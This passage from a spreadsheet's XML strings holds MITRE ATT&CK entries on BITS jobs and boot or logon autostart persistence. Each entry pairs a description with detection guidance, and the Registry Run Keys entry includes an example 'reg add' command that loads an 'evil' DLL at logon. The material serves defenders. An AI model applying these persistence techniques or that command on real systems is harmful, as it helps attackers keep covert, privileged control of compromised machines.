    <t xml:space="preserve">Monitor network traffic for uncommon data flows (e.g. unusual network communications, suspicious communications that have never been seen before, communications sending fixed size data packets at regular intervals).  Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. </t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS)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The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)
Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)
BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1197</t>
  </si>
  <si>
    <t>Defense Evasion, Persistence</t>
  </si>
  <si>
    <t>BITS runs as a service and its status can be checked with the Sc query utility (&lt;code&gt;sc query bits&lt;/code&gt;).(Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (&lt;code&gt;bitsadmin /list /allusers /verbose&lt;/code&gt;).(Citation: Microsoft BITS)
Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)(Citation: Microsoft BITS) Admin logs, PowerShell logs, and the Windows Event log for BITS activity.(Citation: Elastic - Hunting for Persistence Part 1) Also consider investigating more detailed information about jobs by parsing the BITS job database.(Citation: CTU BITS Malware June 2016)
Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).(Citation: Microsoft BITS)</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>Brent Murphy, Elastic; David French, Elastic; Red Canary; Ricardo Dias</t>
  </si>
  <si>
    <t>Firewall, Host forensic analysis</t>
  </si>
  <si>
    <t>T1547</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution</t>
  </si>
  <si>
    <t>Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547</t>
  </si>
  <si>
    <t>23 January 2020</t>
  </si>
  <si>
    <t>Persistence, Privilege Escalation</t>
  </si>
  <si>
    <t>Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns)  Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. 
Suspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To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
Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.
Monitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.</t>
  </si>
  <si>
    <t>Command: Command Execution, Driver: Driver Load, File: File Creation, File: File Modification, Kernel: Kernel Module Load, Module: Module Load, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Administrator, User, root</t>
  </si>
  <si>
    <t>T1547.014</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Active Setup</t>
  </si>
  <si>
    <t>Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
Adversaries may abuse Active Setup by creating a key under &lt;code&gt; HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\&lt;/code&gt; and setting a malicious value for &lt;code&gt;StubPath&lt;/code&gt;. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)
Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/014</t>
  </si>
  <si>
    <t>18 December 2020</t>
  </si>
  <si>
    <t>Monitor Registry key additions and/or modifications to &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\&lt;/code&gt;.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Bencherchali Nasreddine, @nas_bench, ELIT Security Team (DSSD)</t>
  </si>
  <si>
    <t>Administrator</t>
  </si>
  <si>
    <t>T1547.002</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Authentication Package</t>
  </si>
  <si>
    <t>Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\&lt;/code&gt; with the key value of &lt;code&gt;"Authentication Packages"=&amp;lt;target binary&amp;gt;&lt;/code&gt;. The binary will then be executed by the system when the authentication packages are loaded.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/002</t>
  </si>
  <si>
    <t>24 January 2020</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1547.006</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Kernel Modules and Extensions</t>
  </si>
  <si>
    <t>Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) 
When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)
Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through &lt;code&gt;kextload&lt;/code&gt; and &lt;code&gt;kextunload&lt;/code&gt; commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation)
Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/006</t>
  </si>
  <si>
    <t>30 March 2021</t>
  </si>
  <si>
    <t>Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:&lt;code&gt;modprobe&lt;/code&gt;, &lt;code&gt;insmod&lt;/code&gt;, &lt;code&gt;lsmod&lt;/code&gt;, &lt;code&gt;rmmod&lt;/code&gt;, or &lt;code&gt;modinfo&lt;/code&gt; (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into &lt;code&gt;/lib/modules&lt;/code&gt; and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
For macOS, monitor for execution of &lt;code&gt;kextload&lt;/code&gt; commands and correlate with other unknown or suspicious activity.
Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: &lt;code&gt;apt-get install linux-headers-$(uname -r)&lt;/code&gt; On RHEL and CentOS based systems this can be accomplished by running: &lt;code&gt;yum install kernel-devel-$(uname -r)&lt;/code&gt;</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Kernel: Kernel Module Load</t>
  </si>
  <si>
    <t>Anastasios Pingios; Jeremy Galloway; Red Canary; Wayne Silva, F-Secure Countercept</t>
  </si>
  <si>
    <t>root</t>
  </si>
  <si>
    <t>T1547.008</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: LSASS Driver</t>
  </si>
  <si>
    <t>Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/008</t>
  </si>
  <si>
    <t xml:space="preserve">With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)
Utilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA. </t>
  </si>
  <si>
    <t>Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load</t>
  </si>
  <si>
    <t>T1547.011</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Plist Modification</t>
  </si>
  <si>
    <t>Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by &lt; &gt;. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as &lt;code&gt;/Library/Preferences&lt;/code&gt; (which execute with elevated privileges) and &lt;code&gt;~/Library/Preferences&lt;/code&gt; (which execute with a user's privileges). 
Adversaries can modify plist files to execute their code as part of establishing persistence. plists may also be used to elevate privileges since they may execute in the context of another user.(Citation: Sofacy Komplex Trojan) 
A specific plist used for execution at login is &lt;code&gt;com.apple.loginitems.plist&lt;/code&gt;.(Citation: Methods of Mac Malware Persistence) Applications under this plist run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them.(Citation: Adding Login Items) Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). Some of these applications can open visible dialogs to the user, but they don’t all have to since there is an option to "hide" the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method &lt;code&gt; SMLoginItemSetEnabled&lt;/code&gt; can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1059/002) can do this as well. (Citation: Adding Login Items)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/011</t>
  </si>
  <si>
    <t>File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.
All the login items created via shared file lists are viewable by going to the Apple menu -&gt; System Preferences -&gt; Users &amp; Groups -&gt; Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. Otherwise, Login Items are located in &lt;code&gt; Contents/Library/LoginItems &lt;/code&gt; within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items)
Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1547.010</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Port Monitors</t>
  </si>
  <si>
    <t>Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the &lt;code&gt;AddMonitor&lt;/code&gt; API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in &lt;code&gt;C:\Windows\System32&lt;/code&gt; and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. 
The Registry key contains entries for the following:
* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port
Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/010</t>
  </si>
  <si>
    <t>Monitor process API calls to &lt;code&gt;AddMonitor&lt;/code&gt;.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. 
Monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>File: File Creation, Module: Module Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Stefan Kanthak; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1547.012</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Print Processors</t>
  </si>
  <si>
    <t>Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot. 
Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the &lt;code&gt;AddPrintProcessor&lt;/code&gt; API call with an account that has &lt;code&gt;SeLoadDriverPrivilege&lt;/code&gt; enabled. Alternatively, a print processor can be registered to the print spooler service by adding the &lt;code&gt;HKLM\SYSTEM\\[CurrentControlSet or ControlSet001]\Control\Print\Environments\\[Windows architecture: e.g., Windows x64]\Print Processors\\[user defined]\Driver&lt;/code&gt; Registry key that points to the DLL. For the print processor to be correctly installed, it must be located in the system print-processor directory that can be found with the &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt; API call.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020) The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/012</t>
  </si>
  <si>
    <t>Monitor process API calls to &lt;code&gt;AddPrintProcessor&lt;/code&gt; and &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt;. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver&lt;/code&gt; or &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver&lt;/code&gt; as they pertain to print processor installations.
Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.</t>
  </si>
  <si>
    <t>Driver: Driver Load, File: File Creation, Module: Module Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Mathieu Tartare, ESET</t>
  </si>
  <si>
    <t>T1547.007</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Re-opened Applications</t>
  </si>
  <si>
    <t>Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at &lt;code&gt;~/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt; and &lt;code&gt;~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist&lt;/code&gt;. 
An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/007</t>
  </si>
  <si>
    <t>Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification</t>
  </si>
  <si>
    <t>T1547.001</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</t>
  </si>
  <si>
    <t>Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is &lt;code&gt;C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup&lt;/code&gt;. The startup folder path for all users is &lt;code&gt;C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp&lt;/code&gt;.
The following run keys are created by default on Windows systems:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx&lt;/code&gt; is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: &lt;code&gt;reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"&lt;/code&gt; (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;
The following Registry keys can control automatic startup of services during boot:
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;
The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit&lt;/code&gt; and &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell&lt;/code&gt; subkeys can automatically launch programs.
Programs listed in the load value of the registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; run when any user logs on.
By default, the multistring &lt;code&gt;BootExecute&lt;/code&gt; value of the registry key &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager&lt;/code&gt; is set to &lt;code&gt;autocheck autochk *&lt;/code&gt;. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/001</t>
  </si>
  <si>
    <t>Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.
Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Oddvar Moe, @oddvarmoe</t>
  </si>
  <si>
    <t>T1547.005</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Security Support Provider</t>
  </si>
  <si>
    <t>Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA)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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/005</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>T1547.009</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Shortcut Modification</t>
  </si>
  <si>
    <t>Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/009</t>
  </si>
  <si>
    <t>Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.
Monitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.(Citation: BSidesSLC 2020 - LNK Elastic)</t>
  </si>
  <si>
    <t>Bobby, Filar, Elastic; David French, Elastic; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1547.003</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Time Providers</t>
  </si>
  <si>
    <t>Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of  &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\&lt;/code&gt;. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)
Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/003</t>
  </si>
  <si>
    <t>Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt; as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)
The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Scott Lundgren, @5twenty9, Carbon Black</t>
  </si>
  <si>
    <t>T1547.004</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Winlogon Helper DLL</t>
  </si>
  <si>
    <t>Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in &lt;code&gt;HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\&lt;/code&gt; and &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\&lt;/code&gt; are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) 
